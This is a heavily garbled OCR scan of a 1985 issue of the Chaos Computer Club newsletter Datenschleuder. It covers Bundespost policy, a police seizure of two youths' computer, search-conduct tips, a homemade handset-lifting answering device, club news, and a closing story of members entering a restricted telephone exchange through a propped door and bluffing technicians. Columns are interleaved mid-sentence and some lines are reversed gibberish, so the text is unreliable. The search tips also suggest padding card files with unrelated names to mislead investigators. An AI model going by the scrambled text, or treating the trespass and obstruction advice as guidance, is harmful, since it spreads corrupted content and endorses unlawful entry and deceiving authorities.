the necessary EDV hardware of the training centres is the Si¬
tuation a sad one. In West-Germany mostly only schools in the
bigger towns possess the barely necessary OP-equipment; a
satisfactory equipment is only to be found in centres sponso-
red by data concerns. The bigger pari of German schools
don't provide the possibility to satisty the demands for the fu¬
ture know how. In this way much talent for commercial trai¬
ning runs to waste.
Datenschleuder-Suchanzeige Tcf • d
‘Betr.: Anforderungen der Technischen Universität Managua-
Gesucht werden ein paar 7911-Modems sowie eine Klimasta¬
tion mit (Aufzieh-, Batterie- oder 60Hz-) Uhrwerk und Schrei¬
bern lürTemperaturund Feuchtigkeit.
Im Brief steht noch die ersten acht Punkte von Angelikas
Wunschliste:
“1. sortierter Satz Gewindeschrauben 2. Maulschlüssel 3.
Sortierkästen für Kleinkram 4. Nägel 5, 25polige RS232-Stec-
ker (beide Seiten) 6. Schraubensicherungsmittel/Unterleg¬
scheiben 7. Steckdosen 8. 5 ACJAS für RS232 und Driver für
beide Seiten (TTL nach 12 V)“
Ein Karton Computerpapier kostet in Managua rund 200 DM.
Der Gesamtetat der Uni für das nächste Jahr entspricht etwa
dem Jahreseinkommen eines Wissenschaftlers in der BRD.
But hardware isn't everyihing. The instructors are in a bad
Position. Even trained according to the conception of a higher
scientific aulhority they are faced more and more with pupils
in certain sectors their Superiors. This concept should not be
sacrosanct. An obstinate stand still In the old training siructu-
re does not encourage the present generation. on the contra-
ry it hinders them. It is about time to Start thinking aboul new
collective training methods. adequate training of groups for
example with aid of the woridwtde database network where in
the instructor performs a more important social lunctlon.
Up to the end of the eighties more than 6 million jobs will de-
pend directly or indirectly of EDV. A firm wtiich takes on elec¬
tronic Services fom outside has naturalty to play the role of a
servant, a supplier without really having a finger in the pie.
However, it would be wrong to see oniy the school and job-
training sector as the culprit. There are enough youngsters
who desire to satlsfy their wish to learn even without school.
Through a structured database net the possibility of a really
universal university has been created, which is • at least theo-
retically - at everyone's disposal. But this theory is shipwrec-
ked by lack of money. Knowledge Stands nowadays for com-
munication, and one should be able to afford oneself the ^
means to communication.
lO
Modern torms of data communication are not only left to prl- §
vate Initiative: they are consciously hampered by, parily ac-
cording with EEC regulations defined national clauses. and o
general admittances. The reason: the Bundespost comes in a g
conflict Situation as a manager of the Information net as well §
as the direct supplier of electronic informatlon Services. She n
uses het monopoly herewith In the first place for competi- q
tions. advantages and price fixing instead of. according to the ja
regulations of the constituation, managing an optlnal Informa-
tion net for a reasonable price, at everyone’s disposal. ^
Instead of encouraging such enterprises through liberal and
reasonable priced managing of the telephone and datanet is ^
the Bundespost victim of the reproach to further exactly the "E
contrary of this; private initiative. She went in for the adventu- ^
re of big projects, such as BTX, which llmit considerably the c
movements of the state enterprise and link it to the chain of ^
some data concerns. BTX and similar big projects are not only jj
economically dublous but they also force the partlcip^t into ^
the role of the consumer. Aclivity is not wanted. Old mistakes
applied again? An Information firm can’t afford to build dams.
Information will fließen - Information soll fließen!
CCC/BHP: Strassburg den 8. Okt. 1985
Hackerbibel weltwei
Nachdem die erste Auflage in die Welt diffundiert ist, berück¬
sichtigten wir in der zweiten den Wunsch eines Gebührenprü¬
fers auf eine Streichung. Besonders wertvoll sind die ersten
98 Exemplare der ersten Auflage, die an die Subskribenten
verschlcM wurden: die letzten beiden Selten mit zulässiger
Werbung wurden vom CHAOS-TEAM unter Postaufsicht
rausgerissen und in einen Postpapierkorb geworfen, da das
vorletzte Blatt (Seite FF) einen angeblich werblichen Hinweis
auf Fotokopien mit Preisangabe enthielt. “Bringen Sie 98
Postwertzeichen zu je 1,20 mit" war das Alternativangebot
des Gebührenprüfers (Büchersendung plus 1,20 gleich Päck¬
chen). Um weitere Unklarheiten für die dritte Auflage endgül¬
tig zu beseitigen, erhielt unser obersten Gebührenprüfer Dr.
CSS zur umgehenden Prüfung per Post zugesandt.
Wir warten noch auf Bescheid und freuen uns, daß der Mini¬
ster jetzt wie alle anderen Posf/erf/nnen) während seiner
Dienstzeit die Hackerbibet tesen darf, um sich gebührenrecht-
fich fortzubiiden, da es sich um einen interessanten Sireitfalt
handelt.
in zweiter Auflage
Der Transit von Hackerbibeln durch die DDR nach Polen ver-
anlaßte einen volkseigenen Beamten, nachdem er das Titel¬
bild gemustert hatte, zum Aufschlagen des Buches. Er stand
geschlagene drei Minuten und betrachtete das Innencover.
Zielstrebig hatte er die einzig kodierte Stelle Im Buch gefun¬
den.
Er fand heraus, daß es unter 500 Bit sind, durchblälterte den
Rest des Buches in 500 Millisekunden und entschied vernünf¬
tig. Er klappte das Buch wieder zu und gab es zurück.
Nach Nicaragua wird jetzt ein Exemplar der Hackerbibel ge¬
schickt, nachdem wir von dort eine ‘datenschleuder Suchan¬
zeige“ erhielten, damit die endlich auf Draht kommen.
Aus der Schweiz erfahren wirgerOchteweise, daß sich beider
Barbezahlung einer Hackerbibel entweder der Käufer oder
der Verkäufer strafbar mache, da es keine einzelnen Rappen
mehr gibt, nur Fünfer. Und die Buchprelabindung schreibt
den Preis von 33 Franken, 33 Rappen vor.
Ausfall der Macht
Polizei beschlagnahmt Kleincomputer und
persönliche Daten
(erd) Am 9.11. 85 (and der automobile Klönschnack
zweier Jugendlicher Hamburger Computerfreunde
ein Jähes Ende. Polizisten einer Dienststelle, die
sich, wie es heißt, auf die Verlolgung undefinierbarer
Verkehrsverstöße spezialisiert hätten, setzten zwei
Jugendliche über Stunden lest und beschlagnahm¬
ten Ihren Computer sowie mehrere Flopples mit um¬
fangreichen persönlichen Daten.
Die Polizei behauptete,
sie verfolge die beiden wegen .Mißbrauch. {Postbuch S. 234)
bzw. .Störung von Fernmeldeanlagen.
Zitat Par. 317Strafgesetzbuch;
(1) Wer den Betrieb einer öffentlichen Zwecken dienenden
Fernmeldeanlage dadurch verhindert oder gefährdet, daß er
eine den Betrieb dienende Sache zerstört, beschädigt, besei¬
tigt. verändert oder unbrauchbar macht oder die für den Be¬
trieb bestimmte elektrische Kraft entzieht, wird mit Freiheits¬
strafe bis zu fünf Jahren oder mit Geldstrafe bestraft.
(2) Der Versuch ist strafbar,
(3) Wer die Tat fahrlässig begeht, wird mit Freiheitsstrafe bis
zu einem Jahr oder mit Geldstrafe bestraft. Zitat Ende.
Die persönliche Datenübertragung wurde von den
Beamten durch Taslatureingabeverbot unterbrochen.
Ein Polizist hatte die Autotür aufgerissen und rief so¬
was wie: .Nichts verändern!.. Starr saßen die Jugend¬
lichen, bis die Mailbox auflegle. Sie sahen nach ver¬
geblichen Versuchen die Unmöglichkeit einer Erklä¬
rung der Zusammenhänge ein und mußten lachen
über die Tragik der Polizei, völlig unschuldige Hacker
bei nichts zu erwischen.
Dann mußten sie hinten im Peterwagen Platz nehmen. Die
Kindersicherung wurde aktiviert.
Nach kurzer Zeit tral der erste telepathisch alarmiorte Hecker
ein und machte Fotos. Leider war darauf nur eine hellerleuch-
tele Hamburger Sparkasse zu sehen.
Nach zweieinhalb Stunden traf der erste Postsachverständige
ein. eine halbe Stunde später der zweite. Beide stellten nichts
fest außer einer ordnungsgemäßen ortsveränderbaren Date¬
nübertragung mit einer zugelassenen Zusafzeinrlchtung nach
FTZ-Formblatt 18.13.1940.00, Trotzdem beschlagnahmten die
Polizisten .Akustikkupplung.. .Tastenelement. (C64-Com-
puter). Floppy, Fernseher. Spannungswandler. Mehrfach¬
steckdosen und — das ist das gravierendste — persönliche
Daten aller Art auf .viereckigen Scheiben.. Die Polizisten
überhörten die scharfen Proteste bei der Beschlagnahme der
Daten und nahmen eine Reihe privater, nicht genau archivier¬
ter Disketten mit. Beschlagnahme ohne Protokoll ist rechts-
v^drig. Aber was helfen Argumente oder Datenschutzgesetze
gegen bewaffneten Gehorsam?
Oie zu Unrecht Beschuldigten informierten darüber, daß ihre
Floppys nicht einmal versiegelt wurden. Anstelle des verlang¬
ten R’otokolls erhielten die beiden Datentouristen nur die Vi¬
sitenkarte eines der Beamten. Die Geräte durften nicht einmal
verpackt werden, sondern mußten auf Verlangen der Polizi¬
sten so in den Kofferraum des Peterwagens geladen werden,
daß die Inbetriebnahme der Geräte durch die Polizei ohne
lange Kabelei möglich war. Den Beschuldigten wurde außer
einem durch Postsachverständige entkräftetem Verdacht
nichts vorgeworfen, die Beschlagnahme geschah auf .aus¬
drückliche Anweisung von oben..
Kfarfexf; Höhere D/ensfste/len der Polizei meinen, durch Funk
besser Informiert zu sein a/s Sachverständige der Post vor
Ort.
ln dieser Anmaßung liegt ein Stuck Polizeistaat.
Die jetzt in der Zeitschrift .Bürgerrechte und Polizei, von Cl-
LIP, Berlin veröffentlichten bislang geheimgehaltenen Geset¬
zentwürfe (ZAG usw.) dokumentieren den gegenwärtigen
Versuch des Staates, das informationelle Selbstbestim¬
mungsrecht der Bürger zum Informationellen Selbstbedie¬
nungsrecht der Sicherheitsbürokratie zu machen.
Widersland dagegen isl Bürgerpflicht.
Für eine knappe Woche waren die beiden Jugendlichen ohne
Computer und eine Menge persönlicher Daten. Sie wissen
nicht, wer alles bei der Polizei ihre Daten kopiert hat und was
mit dem Computer geschah: Auf welchen Dienststellen wurde
er von welchen Fachkräften in Betrieb genommen? Wurde
damit gespielt?
Zwar führten sämtliche telefonischen Anfragen schon am Tag
nach der Beschlagnahme zu der ständig wiederholten Aus¬
kunft. daß die Geräte abholbereit wären, weil nichts vorläge.
Oie Jugendlichen hatten, um Verwechslungen der Geräte
auszuschließen, sogar alle Kaufbelege für die Geräte zusam¬
mengesucht. Doch die Abholung wurde zur Odysee zwischen
mehreren Dienststellen.
Zudem besteht der Verdacht, daß eine Dienstanweisung der
Polizei hier all denen, die einen lockeren persönlichen Um¬
gang am Weltdalennetz pflegen. Knüppel zwischen die Finger
werfen will. Denn die beiden Beamten handelten auf Anwei¬
sung.
Derartiges Vorgehen bewirkt, daß die BRD computermäßig
ein Entwicklungsland bleibt. Sogar di© DDR gestattet inzwi¬
schen sowohl Betrieb als auch die Einfuhr von Computern;
bei Akustikkopplern denkt sie noch nach.
Eine kurze juristische Übersicht ergibt neben alltäglicher poli¬
zeilicher Willkür Anlaß zu verschiedenen Beschwerden:
1. Es wurde keine Rechtsbehelfsbelehrung erteilt, das Ist ein
Verstoß gegen VwGO Par, 59.
2. Ein Beschlagnahmeprotokoll gab es nicht, obwohl es ver¬
langt wurde. Par. 107 StPO schreibt vor: .Dem von der
Durchsuchung Betroffenen ist nach deren Beendigung auf
Verlangen eine schriftliche Mitteilung zu machen, die den
Grund der Durchsuchung (Par. 102. 103) sowie Im Falle des
Par. 102 die Straftat bezeichnen muß. Auch ist Ihm auf Verlan¬
gen ein Verzeichnis der in Verwahrung oder in Beschlag ge¬
nommenen Gegenstände, falls aber nicht Verdächtiges ge¬
funden wird, eine Bescheinigung hierüber zu geben..
Par. 109 StPO; .Die In Verwahrung oder in Beschlag genom¬
menen Gegenstände sind genau zu verzeichnen und zur Ver¬
hütung von Verwechslungen durch amtliche Siegel oder in
sonst geeigneter weise kenntlich zu machen..
Par. 110,3: .Dem Inhaber der Papiere oder dessen Vertreter
ist die Beidrückung seines Siegels gestattet: auch ist er. falls
demnächst die Entsiegelung und Durchsicht der Papiere an¬
geordnet wird, wenn möglich, zur Teilnahme aufrufordern..
Bedenklich stimmt der Stil, mit dem die Polizei .undefinierba¬
re Verkehrsverstöße, verfolgt. Bei der Befragung unserer
Rechtshilfedatenbank fand sich unmittelbar vor Par. 317.
.Störung von Fernmeldeanlagen, folgender Paragraph;
.Par. 316a Räuberischer Angriff auf Kraftfahrer
(1) Wer zur Begehung eines Raubes (Par. 249. 250), eines
räuberischen Diebstahls (Par. 252) oder einer räuberischen
Erpressung (Par. 255) einen Angriff auf Leib. Leben oder Ent¬
schlußfreiheit des Führers eines Kraftfahrzeuges oder eines
Mitfahrers unter Ausnutzung der besonderen Verhältnisse
des ’Slraßenverkehrs unternimmt, wird mit Frerheitsslrafe
nicht unter fünf Jahren bestraft. In besonders schweren Fällen
ist die Strafe lebenslange Freiheitsstrafe, In minder schweren
Fällen Freiheitsstrafe nicht unter einem Jahr.,
Bel einer Woche Computerentzug durch staatliche Willkür Ist
dieser Paragraph irgendwie naheliegend.
Die Macht der Polizei mißt sich daran, wo für sie gilt, was für
andere gilt.
Eine Entschuldigung ist das mindeste.
bullen14,ws8512040Ö07 ds14-3
Allgemeine Hinweise bei staetlichen Ausfäilen ,
□er voraussehbaren Gefahrenlage angepaßte kurze Hinweise
finden sich regelmäßig in der dalenschleuder (nachgedruckl
in der Hackerbibel S. 144/146,153,161,174).
Praktisch und ausführlich ist der Artikel in der Zeitschrift
Schneider aktiv 11/85 ‘Abmahnung/Durchsuchung — was
tun?“ Zitat: “Wessen Name bei der Hausdurchsuchung in
einer Kartei gefunden wird, gerät in Verdacht... Wer also da¬
heim Namen aufbewahrt, die der... Justiz zugänglich werden
können, tut gut daran, in die Kartei auch blinde Namen einzu¬
fügen, die rein gar nichts mit der Sache zu tun haben.“ Thema
Abmahnungsformulierung für Unschuldige: “Ich habe zu der
Abmahnung keine Veranlassung gegeben; ich gebe die fol¬
gende Unterlassungserklärung ohne Anerkennung einer
Rechtspflicht hierzu ab; die Kosten Ihrer Rechtsverfolgung
trage ich deshalb auch nicht; die Unterlassungserklärung lau¬
tet: Ich werde es unterlassen...“ (unbedingt Text im Zusam¬
menhang lesen! II)
Keep cool!
Grundsätzlich gilt “Ruhe bewahren“ als oberstes Gebot. Be¬
trachte die Dir gegenüberstehenden Kräfte mit derselben di¬
stanzierten Nähe wie ein zu löschendes Feuer. Oberstes Ge¬
bot ist “Ruhe bewahren“; falsches Vorgehen kann einen tra¬
genden Balken verbrennen lassen und Dir fällt die Decke auf
den Kopf. Du rufst die Feuerwehr, wenn es brennt. Bei staatli¬
chen Ausfällen ruf einen Anwalt. Das kann auch per Mailbox
geschehen.
Wenn das nicht geht, rufe einen Nachbarn oder Freund zu Hil¬
fe. Alles, was beschlagnahmt wird, muß detailliert aufgeführt
und versiegelt (!!!!!!!!) werden. Bestehe darauf.
Wenn die Beamten sich weigern. Deine vernünftigen Forde¬
rungen zu erfüllen, erstelle mit Deinem Computer eine Akten¬
notiz. Die Beamten werden das ebensowenig unterschreiben
wie Du ihren Kram. Lasse Dir Deine Rechte erklären, bis Du
sie verstanden hast. Spiel das gelegentlich praktisch durch
mit Freunden.
Wenn Staatsdiener NICHTS wissen und NICHTS sagen, muß
es Dein Ziel sein, sie zu übertretfen.
Für MAILBOX-Betreiber und solche, die es werden wollen
legalen automatischen
Aufbau eines
Beantworters
Frei nach Fernmeldeordnung Par. 12
Carrier’- Wenn es nun klingelt legt unser Tierchen also los und gibt den
Datentransfer nach dem Klingelton frei.
Was. wenn meine Gegenstelle nun LOGOFF gibt oder einfach
den Hörer auflegt?
Ganz einfach! Wie gesagt, sollte unser Koppler ja über einen
Da, wie ja oben ausführlich erklärt, der Weg eine Mailbox mit t.» ■ j- ^ •
einem Modem und Auto-Answer-Karle zu betreiben, zwar der PL“*!;
Beste aber noch lange nicht der von Seiten der Behörde gebil*
ligte Weg ist. hier die entsprechende relativ kostengünstige AI-
ternativ-Lösung:
Man nehme erstens den Rechner seiner Wahl (FTZ-Zulassung
lieh wegbleibt. gibt der Computer einfach ein Signal an unser
Tierchen! Dieses Signal wiederum veranlaßt ein zweites Relais
dazu, die Spannung umzupolen und der Getriebemotor setzt
sich nun In umgekehrter Richtung — also nach unten in Bewe¬
gung um die Gabel des Telefons wieder einzudrücken. Auch
unwichtig). Zweitens einen handeisüblichen Akustik-Koppler empfiehlt sich ein Endabschalter! Bei einem-ordnungsge.
Anmeldungen zum CCC'1985
Chaos Computer Club
Leitstelle 23
Schwenckestr. 35
□-2000 Hamburg 20
27. bis 29, Dezember 1985 täglich 10;00 bis 18:00 Uhr
im Eidelstedter Bürgerhaus
Elbgaustraße 12
§ räB E
|S|||H
^ 0> T3 2 ® ® ®
s r s. S s 5
2 S a » S t S.
4» Ot'a, p eo c ^
“I"
O £ XJ n O ^
•- b. O 19 ®
U. V) O O > ^
ü •'
E g-”
O j“
H) » «
C ^ Ä
V ^ <b
^ C
ds14-4
(unbedingt mit FT2-2ulassung). Möglichst mit Carriercheck-
Optlon, wie z.B. CTS oder DTR {als einigermaßen günstig und
sicher wäre hier z.B. das DATAPHON zu nennen — Leute mit
dickerem Geldbeutel werden den EPSON vorziehen). Drittens,
den nachfolgend grob beschriebenen Elektro-Mechanismus —
nennen wir Ihn doch einfach mal Tierchen’.
Tierchen deshalb, weil laut Fernmeldeordnung eine dressierte
Katze den Hörer bei einem Telefon-Klingel—Signal abnehmen
darf
Oie Situation ist also;
ES KUNGELT UND JEMAND MUSS RANGEHEN I
Jetzt bieten sich drei Möglichkeiten an:
1) Ich gehe selbst an den Hörer, was auf die Dauer in Arbeit aus¬
arten könnte
2) Meine Katze ist tatsächlich überdurchschnittlich intelligent
und entsprechend gut dressiert
3) Mein Tierchen wird zusammen gehäkelt und übernimmi ge-
^ S ® wIr
Tierschülzer wählen Punkt 3! ^ ^ ^ ^
Damit das Tierchenweifl. wann esaktivwird,muß es das Klingel- Toiofnnnnm^^^ nttonti Porr,=nro.-hhiirh a,if
Signal erkennen können. Die eine Möglichkeit ist ein Klatsch- ^ nJ fnsprechbuch auf-
schalter - aber nicht sehr empfehlenswert, da diese Dinger auf o''
alle möglichen Geräusche ansprechen und außerdem das Tele- ihr .n» Inn n"
fon Immer erst mal kräftig klingeln muß. Besser ist es wenn wir wTn kn ZirzlnlnJnhu?« L r , n. h U-?rf
HnnKiinn»i-Sir,n»i,nH.,i<tk(rih ,',h.r,.in=.c!r„,i.„n.=rH..mToi. bessere Weg ist. einen Zweilanschluß (kostet ca. die Hälfte
mäßen' LOGOFF passiert nichts anderes. Im Anschluß an diese
Prozedur macht der Computer das Tierchen noch wieder
'scharf und da Spiel kann von vorne beginnen!
Kosten für unser Tierchen — je nach Aufwand: ca. 25.— bis
50,— Märker. Der Phantasie sind bei der Gestaltung keine
Grenzen gesetzt und so würde sich vielleicht ein kleiner POST-
gelber Kran sehr decorativ machen. ..
Die bislang originellste bekannte Lösung ist ein kurzes Stück
Modelleisenbahn. Die Lok fährt beim Klingeln an und hebt über
einen Seilzug einen Minisandsack hoch. Zum Auflegen fährt sie
rückwärts.
Wer nun wirklich eine Stückliste o.ä. braucht, dem sei (z. B.)
eine ältere Ausgabe der Zeitschrift 'RUN' empfohlen, Im Artikel
'Haarscharf an der POST vorbei’ wurde so ein Tierchen bereits
1984 als 'Anrufbeantworter' detailliert mit Schaltungs- Vor¬
schlägen erklärt.
Noch ein paar Tips am Rande:
Jeder Teilnehmer hat für die ordnungsgemäße Abwicklung sei-
das Klingel-Signal induktiv (d.h. über eine Spule unter dem Tel.-
App.) abgreifeni Das hat den Vorteil, daß herkömmliche Laut-
weri<- App. sogar auf ganz leise gedreht werden können - leider
nicht die moderneren ALPHA- BETA- etc. Telefone — funktio¬
nieren tut unser Tierchen aber auch damit, da das Tierchen sich
mit dem ersten KHngel-lmpuls zufriedengibt. Der induktive Ab¬
griff ist It. Amtsblatt-Verfügung Nr. 1009 (Ambl. Nr.145/1981) als
private Zusatzeinrichlung genehmigt und anmelde- und gebüh¬
renfrei! Ueber eine hier nicht näher erklärte einfache Schaltung
wird dieses Signal verstärkt und dann mittels Relais ein kleiner
eines Hauptanschlusses und wird bei einer Mehlbox ohnehin
benötigt) zu beantragen, dafür muß man nämlich keinen Eintrag
ins Tel.-Buch vornehmen lassen! Und wo kein Eintrag ist, kann
ich mich melden wie ich will — also auch gleich mit einem Car¬
rier! _
Cw ' ^» 11^1
Nachsatz: Sollten sich die Kollegen POSTler dennoch unter ir¬
gendeinem Vorwand die bestehende Telefonanlage des Betrei¬
bers ansehen wollen so wäre vielleicht noch anzumerken, daß
dies durchaus deren gutes Recht ist — ABER NUR NACH
vorheriger Anmeldung und zu zumutbaren Tageszeiten
nach oben bewegen, bis dieser an seine obere Endabschaltung
kommt (Microschalter).
Die 'Anlage' wird nun so aufgebaut, daß der Telefonhörer be¬
reits fest im Koppler drinsteckt und der besagte Hebel in Ruhe¬
stellung auf der Telefangabel aufliegt und diese sanft runter¬
drückt. Unter keinen Umständen die darf die Feder, die die Tel.-
Gabel hochdrückt gegen eine 'ältere überdehnte’ ausgetauscht
werden, da die Gabel mit einem schwachen Motor dann sehr
leicht runtergedrückl werden kann: Eingriffe in den POSTeige-
nen App. and selbstverständlich verboten.
Opfer in der Bank lösten einander ab
« —. — — Ul
Die Dresdner Bank am Gänse- 'S « S
ma/kt ging am Mittwoch abend S'o-S
buchstäblich auf Kundenfang. Wer 4 g-e
sich an ihrem Geldautomaten mit '-o c
Barem versorgen woUle, kam zwar 3 w g
in den Vorraum hinein - aber an- £ « g
schließend nicht mehr heraus. >. b §
Insgesamt waren ea mehrere Dut- *0 « u
zend Menschen, die so fUr eine Wei- i |
le eingesperzt waren. Sie maßten n ^ §
auf den nächsten Kunden, der die g!pjs
elektronische Tür-Automatik von 2 6
außen mit Hilfe seiner Euroscheck- «pg
karte öffnete. Was war passiert? h v
Wenn sich die Herren also nicht angemeldet haben, sollte man
sie unter Ausdruck des tiefsten Bedauerns wieder unverrichte¬
ter Dinge wegschicken.
© 10/85 Sy/RAMses
■ 6 unßnpa/\ jnz uaj
-! 0 Ssgoas eseip uagejsuajnai^jBpay uain© •„)(pnja ujnz jn 6 „
igpfu goou jaqe pu!S ’ßunjiBLios ppusujagosja ßiiiunujaA aufa
Ljone uaiiBMiua AX-AVd i 9 qn uajias sqoas uaiön/aßisq aiQ
'uoij^iepay aip ue ^aug oiauia
U| OS /so^uuoA e6|U!a qieqsaa uapjaM jöiazaö^ne uaÄu
-BUJaiiv uassntu jaiq ‘ 6 unu! 0 /g J9P uiq qo| Al-^ed sep iujluo^
‘;qoeuj ßummos JazjBMqos jana ajp ‘ßun|aqB>^jaA Jap v.Vin
Impressum: dalenschleuder U. Dezember 1985 Das wissenscnaiiiicne Facnoiaii für Daienreisenae
SfbcheiPl acMmal im Jahr alle42 (!) Ta^e Verleger und VisdHmbPG Her wart HoMafid-Montz. SctiwencLesir
S5. O-20(X) Hdfcburg 20 RedaKtionsadresse e&enda. eleH'oncsch IMCA CHAOS-TEAM Eigendruck tm
Selbstverlag Oateniioriveriterurig und Satz BiTB Neue Jahresbezugsprcise DM 60 normal. DM 30
Schüler u a . ah OM lOO Forderabo die veroltonliichien BeHrage smd u'heberrechilich geschot;!
Vervieltailinungen tut gewerbliche Zwecke verpfiiciuen 2ur Gebuhfenzanlung an die VG Won. Abt Wt
Goelheslr JO 8000 München 2 Weilerverbretlung m kostenl(Dsen elektronischen iniorrnationsdiensten
nach den in iMCA. Brett Dalenschleuder. veroflentHchten Vc'breilur.gsLedmguf'gen gestaltet die ds ist
abrufoar via IMCA uf.d angeschlossene iNTERMAIL-Hosts COMBOX CCC NEWS BMI-NET ZEV
einige Teielonboxen In Rix “fiSS-lZl mit Be^teilservice Kopier-Recnt (Nachdruckrecht) (ur n'cht
gewerbi'Che Zwecke Nur emwandfrerc Vorlagen der neuesten Ausgabe verwenden Komplett vervieilalligen
Abgabe nur kostenfrei Auszüge nur mit dem Hinweis 'ausdatenschleudcr l3, C992rF Der Zusammenhang
aus dem die Vorlage stammt sollte «rkonnbar bleiben. Zwei Belegexemplare an die ds-Rcdaklion
Compuskripie per Pos! aut Fioppy 3 5 MSOOS/10S''XF. 5 1'^ Siri'js/C64.TVT802 (nur notfalls IBM) ode
oaoiern VI.-J Dal«*« (nur nach Ansbr.ir.ne“) über ZCZC ans CHAOS-TFAM impreslS ws 850929 Z’nrj
© datenschleuder 14 ä De 2 ember 1985 ■ö' C9927F
Alltägliches Chaos
Besuch bei der Post
Formblött TEXT/BESTELL .US 851013 1415 gültig bi? Er =ctie i n&n NDVS5
Bei Beder-f dieses Fcirmblett -f o t ok op i er be.r .
Probleme mit einer kaputten Harddisk sowie Softwarehinund-
her verzögerten das Erscheinen dieser Ausgabe entschieden.
Ein Haufen Text ist nicht 'sch enen. da wir aus Kostengrun¬
den erst bei über 1000 Abonnenten die Zeichenzahl pro Aus¬
gabe erhöhen werden durch mehr Seiten. Kleinere Schrift
(wie in der 131 führte zu Proleststürmen.
Die datenschleuder wird (efzt nicht mehr mit der Buchma-
schine. sondern mit einem eigenen Satzsystem erstellt. Wenn
es fertig ist. läuft es auf einem Netzwerk aus 520ern.
Die bisherige Versandabteilung schaffte die Arbeit nicht mehr
(ist alles 'ehrenamtlich“) und die Daten sind am “Umziehen“
in die Clubräume (feuchter Keller, mehr ist finanziell nicht
drin).
Bel der Durchsicht des Bestandes, der aufgrund von Be¬
schwerden dringend wurde, stellte sich heraus, daß die An¬
zahl verschickter Exemplare deutlich größer als der Geldein¬
gang ist: Lesertyp A bekommt die datenschleuder schon ein
Jahr umsonst und Nichtlesertyp B hat bezahlt, aber nichts
bekommen. A ist viel größer als B und erklärt unser finanziel¬
les Loch.
Außerdem gab es (svohl wegen nicht abschließbaren Briefka¬
stens) Verluste eingegangener Post bei der bisherigen
Adresse — da verschwand nicht nur Bargeld aus dem Brief,
sondern manchmal, so unser Vedrdacht, gleich die ganze
Post. Bitte deshalb NUR die neue Redaktionsadresse benut¬
zen: Schwenckestr. 85,2 HH 20.
Langsam bilden sich (vBr)waltende Strukturen aus dem
Chaos. Es wurde ein einheitliches Beslellformblalt entwickelt,
das umseitig abgedruckt ist. Ein gezielte Verschickung (rund
15 Exemplare) an ausgesuchte Besteller ergab, daß etwa 14
das Bestellformblatt ordnungsgemäß ausgefülM zurück¬
schickten. Aber einer fuhr wieder voll auf die 5 OM Marken ab
(Satellitenantenne) und schickte entsprechend mit. Wir kön¬
nen sie nicht gebrauchen, wie bereits kurzes Nachdenken er¬
gibt und die Post lauscht nicht um. Vorsicht: Wir schmieden
böse Rachepläne gegen alle, die zu teure Briefmarken schic¬
ken!
Wers eilig hat: Bestellungen mit diesem Formblatt werden be¬
vorzugt bearbeitet, da es von (fast) allen CCC-Mitgliedern
(wie leicht einzusehen ist) bearbeitet werden kann.
Wichtige Informationen. Danksagungen. Schmähungen und
Beleidigungen sowie Liebesbriefe bitte getrennt einreichen.
Einige Beschwerden gab es zur Hackerbibel. Bericht zur La¬
ge:
In Tag- und Nachtarbeit entstanden Anfang August die letzten
Seiten in Hamburg, Dabei traten nur kleinere Katastrophen
auf (zB beginnt der Telex-Artikel mit "Itumspannendes Telex¬
netz*. die Vorlage für die Btx-geht-Seite wurde versehentlich
nicht abgeschickt und abgedruckte datenschleudern sind nur
richtig sortiert, wenn Seitennummern drautstanden. Oer
Drucker war trotz verspäteter Einlieferung pünktlich und das
Buch wurde, wie in ds- ifa-Sonderausgabe angekündigt, ab
1$. 9. ausgeliefert.
Wegen Mchieintreffens der CCC-intern angekündigten ko¬
stenlosen Versandtüten konnten bei der ersten Verschickung
nur PLZ-mäßig niedrige Subskribenten versorgt werden, dann
waren die vorsichtshalber trotzdem teuren Tüten alle.
Auch einige Belegexemplare wurden nicht verschickt. Und
vom Bahnhofspostamt mußten wir mit den zwei Zentnern zum
Nachtschalter am Hühnerposlen. Naja. Zwei Tage später, als
wirmeinten, der Kram sei jetzt vom Tisch, rief der Gebühren¬
prüfer an und wollte über 100 Mark extra für die ersten 98
Exemplare. "Werbung“ sei Im Buch, deshalb sei es ein Päck¬
chen. Aufs. 37 sei etwas mit Preis angeboten. Unser Wider¬
spruch. es handle sich um einen Aprilscherz auf englisch
(does your Computer sometimes cough, sneeze or have a
seizure? Blitzbug 19.95 Dollar. Rezeptfrei. Nur nach Anleitung
verwenden!), ward akzeptiert, der Gebprü meinte, er könne
kein englisch. Über Seite FF usw. mehr an anderer Stelle in
dieser Ausgabe.
Abschließend soll der verwaltungsinterne Begriff der Vernich¬
tung durch Materietransformation ersetzt werden.
/nfernf4.ws 651206
Eigentlich wollten wir ein paar Artikel iur die nächste OS überar¬
beiten. Während wir bei Kakao-Kaffee die neuesten Antwortsei¬
ten in BTX durchgehen und ich nebenbei meinen Kontoauszug
Im externen Rechner der Verbraucherbank ansehen will, ge¬
schieh! Seltsames. Alle Telefone der vier Amtsleitungen im
Raum zeigen nacheinander das von Leitungsprüfungen her be¬
kannte Tickern. Und ich hatte gerade meine Kontogeheimzahl
eingegeben * Ls23 nimmt den Hörer von einem der freien Appa¬
rate und versucht auf der toten Leitung mit dem Tester zu reden.
Wie zu erwarten: Set Erfolg ■= kein Erfolg. Auch ein Anruf bei der
Störungsstelle mit der Frage, ob im Fernmeldebereich Bauar¬
beiten durchgeführt werden, führt zum selben Ergebnis. Aber
wir erfuhren, wo die zuständige OVSt (Ortsvermittlungsstelle)
ist. Wir beschließen, die Leitungen selbst zu “entstören“. Mit
dem noch von der Fahrt zur Hannovormesse leicht verbeulten
VW Variant gehts zur zuständigen OVSl. Die vordere Tür ist zu.
Der Hintereingang ist zwar gut versteckt, aber wo ein Hackerist
ist auch ein Weg. Den Wagen stellen wir auf den Diensthof ab
und machen uns auf die Suche nach einer offenen Tür. Sie ist
schnei) gefunden und durch einen Ziegelstein gesichert. Das
Schild ‘Oienstgebäude. unbefugter Zutritt verboten!“ kann uns
nicht schocken, wir fühlten uns befugt. Auf dem Flur entdeckt
Ls23 beim Schwarzen Brett einen Wohnungsnachweis für Post¬
ler. den nimmt er ersimal mit fm nächsten Stock sind wir unse¬
rem Ziel näher, die seitlichen Türen sind hier aus feuerfesten
Stahl, nur leider zu. Im vierten Stock werden wir endlich fündig,
eine Tür ist nur angelehnt. Wir treten ein und stehen vor den Re¬
laisschränken. Sofort beginnen wir mit der Suche nach den ge¬
störten Anschlüssen Plötzlich tauchen drei Fernmeldetechnl-
ker auf: “Von welcher Dienststelle kommen Sie?’. Ls23 nennt
seine Tel Nr. 'Ich verfolge eine Störung Im Fernmeldenetzl“.
Daraufhin lassen auch die letzten Gelben Herren Relaisputzbe¬
